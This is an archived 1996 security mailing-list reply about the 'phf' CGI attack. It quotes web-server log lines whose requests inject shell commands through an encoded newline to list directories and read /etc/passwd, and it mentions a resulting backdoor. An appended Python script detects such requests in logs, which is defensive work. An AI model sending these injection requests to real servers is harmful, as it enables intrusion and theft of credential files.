[2955] in WWW Security List Archive


Re: 'phf' cgi-bin attack

daemon@ATHENA.MIT.EDU (Morgan A. Miskell)
Tue Sep 17 11:40:11 1996

Date: Tue, 17 Sep 1996 09:57:24 -0400
From: "Morgan A. Miskell" <mormis@caro.net>
To: "Jordi \"Matemàtic\" Salvat" <jordi@webarna.com>
CC: www-security@ns2.rutgers.edu
Errors-To: owner-www-security@ns2.rutgers.edu

Jordi "Matemàtic" Salvat wrote:
>
> Many Spanish ISPs are receiving attack attempts on their WWW servers...
> they detect them on their log files in entries such as:
>
> info26.jet.es - - [04/Sep/1996:03:17:21 +0100] "GET /cgi-bin/phf?Qalias=x%0a/bin/ls%20-la%20/ HTTP/1.0" 404 -
> infovia36_bcn.tinet.fut.es - - [04/Sep/1996:08:52:05 +0100] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
> ia245.arrakis.es - - [04/Sep/1996:14:45:35 +0100] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
> modem5.mrbit.es - - [09/Sep/1996:04:38:21 +0100] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
> modem5.mrbit.es - - [09/Sep/1996:06:15:21 +0100] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
> ppp03.las.es - - [12/Sep/1996:20:17:22 +0100] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
>
> Obviously attempting to get the passwd file.
>
> What is curious about these attacks is that they all come from different
> dial-up providers, from users apparently scattered throughout Spain.
> Maybe an "organized" group who meets and exchanges ideas over the I-net?
> There have also been a few attempts apparently coming from the US. Of
> course most providers have initiated action to find out who those
> cracker-apprentices are, and warn them that what they are doing is a
> delict under the new Spanish Penal Laws.
>
> At least one of these attacks has been successful. The hacker then
> reportedly managed to find out root password (bad password choice?) and
> replaced the getty and getty to leave a 'backdoor'. The hacker was
> reportedly invisible to 'who' and 'last', so the only way to know
> whether he was logged in was to look at the process list.
>
> Does anyone know what this 'phf' cgi-bin is supposed to be?
>
> Thanks for your help.
> --
> Jordi Salvat i Alabart
>   Web Edicions Barcelona
>   edicions i consultoria Internet
>   http://www.webarna.com

Here is some additional information I have found.

1. phf is ph form which comes as part of standard Apache and
   probably many other Servers.

2. The program uses ph servers to "borrow" the information from your
   machine.

3. The program uses PH, but it will work using, say, the default ph
   server, which is ns.uiuc.edu, so removing or changing permissions
   on ph will not help.
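As an added example (not from either message in this thread), a log-scanning check for the pattern Jordi posted: it parses Common Log Format lines and reports every request to /cgi-bin/phf whose URL-decoded query contains a newline, pulling out the command text that follows the `%0a`. The two attack lines are rewrapped from the log excerpt above; the benign lines and the host name `host.example.net` are constructed.

```python
import re
from urllib.parse import unquote

# Common Log Format: host ident authuser [timestamp] "request" status bytes
CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}|-) (?P<size>\S+)$'
)

def phf_findings(lines):
    """Flag requests to /cgi-bin/phf whose decoded query carries a newline,
    i.e. the %0a that lets a caller append a shell command to the ph lookup.
    Returns one dict per suspicious line; a plain phf lookup with no newline
    in its query is not reported."""
    findings = []
    for line in lines:
        m = CLF_RE.match(line.strip())
        if not m:
            continue                      # not CLF; skip rather than guess
        parts = m.group("req").split()
        if len(parts) < 2:
            continue
        path, _, query = parts[1].partition("?")
        if path != "/cgi-bin/phf":
            continue
        decoded = unquote(query)
        if "\n" not in decoded and "\r" not in decoded:
            continue
        # Text after the first newline is the command the caller appended.
        injected = re.split(r"[\r\n]", decoded, maxsplit=1)[1].strip()
        findings.append({
            "host": m.group("host"),
            "timestamp": m.group("ts"),
            "status": m.group("status"),  # 404 here: the CGI was not present
            "command": injected,
        })
    return findings

# Sample lines: two rewrapped from the thread, two constructed benign ones.
SAMPLE_LOG = [
    'info26.jet.es - - [04/Sep/1996:03:17:21 +0100] '
    '"GET /cgi-bin/phf?Qalias=x%0a/bin/ls%20-la%20/ HTTP/1.0" 404 -',
    'modem5.mrbit.es - - [09/Sep/1996:04:38:21 +0100] '
    '"GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -',
    'host.example.net - - [10/Sep/1996:12:00:00 +0100] '
    '"GET /cgi-bin/phf?Qname=smith HTTP/1.0" 200 512',
    'host.example.net - - [10/Sep/1996:12:00:05 +0100] '
    '"GET /index.html HTTP/1.0" 200 1024',
]

if __name__ == "__main__":
    for f in phf_findings(SAMPLE_LOG):
        print(f"{f['timestamp']} {f['host']} status={f['status']} "
              f"cmd={f['command']!r}")
```

A 404 on these requests, as in every line Jordi quoted, means the server had no phf to run; a 200 on the same pattern is the line worth chasing.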
